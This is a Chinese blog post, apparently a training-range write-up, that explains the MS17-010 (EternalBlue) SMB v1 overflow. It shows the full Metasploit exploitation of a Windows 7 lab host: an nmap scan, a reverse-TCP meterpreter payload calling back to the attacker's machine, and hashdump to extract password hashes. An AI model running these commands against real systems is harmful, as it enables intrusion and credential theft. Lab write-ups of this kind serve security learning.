MS17-010远程溢出(CVE-2017-0143)

本文详细介绍MS17-010漏洞原理,演示如何在靶场上利用该漏洞通过Metasploit框架获取目标Windows 7系统的Shell会话,包括nmap扫描、配置与运行exploit模块及meterpreter后渗透操作。

漏洞介绍

MS17-010漏洞出现在Windows SMB v1中的内核态函数srv!SrvOs2FeaListToNt在处理FEA(File Extended Attributes)转换时,在大非分页池(Large Non-Paged Kernel Pool)上存在缓冲区溢出。
函数srv!SrvOs2FeaListToNt在将FEA list转换成NTFEA(Windows NT FEA) list前会调用。srv!SrvOs2FeaListSizeToNt去计算转换后的FEA lsit的大小,因计算大小错误,而导致缓冲区溢出。

实验环境

这里我用的是安界网的靶场

kali192.168.0.3
Windows7192.168.0.2

漏洞利用

打开nmap对目标机进行扫描

nmap  -sV -Pn 192.168.0.2

目标机开放了135、139、445等端口,系统为win7
然后我们打开msf

msfconsole

打开 metasploite 命令行客户端,使用search命令查找ms17-010漏洞的相关模块

search ms17-010

由于这是靶场所以我们直接利用

use exploit/windows/smb/ms17_010_eternalblue

查看配置信息,并设置标记为yes的属性

show options

设置攻击目标机的IP地址

set RHOSTS 192.168.0.2

之后,选择载荷payload,也就是shellcode,此处我们选择回连至控制端shell的payload

set payload  windows/x64/meterpreter/reverse_tcp

同样,载荷也需要进行配置,show options查看配置信息
配置中缺少本地主机 LHOST,设置一下

set LHOST 192.168.0.3

完成配置后,运行exploit或者run,开始执行漏洞利用模块

run

成功获取来自目标主机的Session会话

我们已经成功的获取Session会话了,本次我们继续介绍meterpreter后渗透模块的其他功能
运行sysinfo查看目标机器相关信息

sysinfo

执行help命令可以帮助我们了解meterpreter有哪些功能

help

接下来,我们获取目标机hash值
执行hashdump

hashdump

总结

又是朴素而又充实的一天!

评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值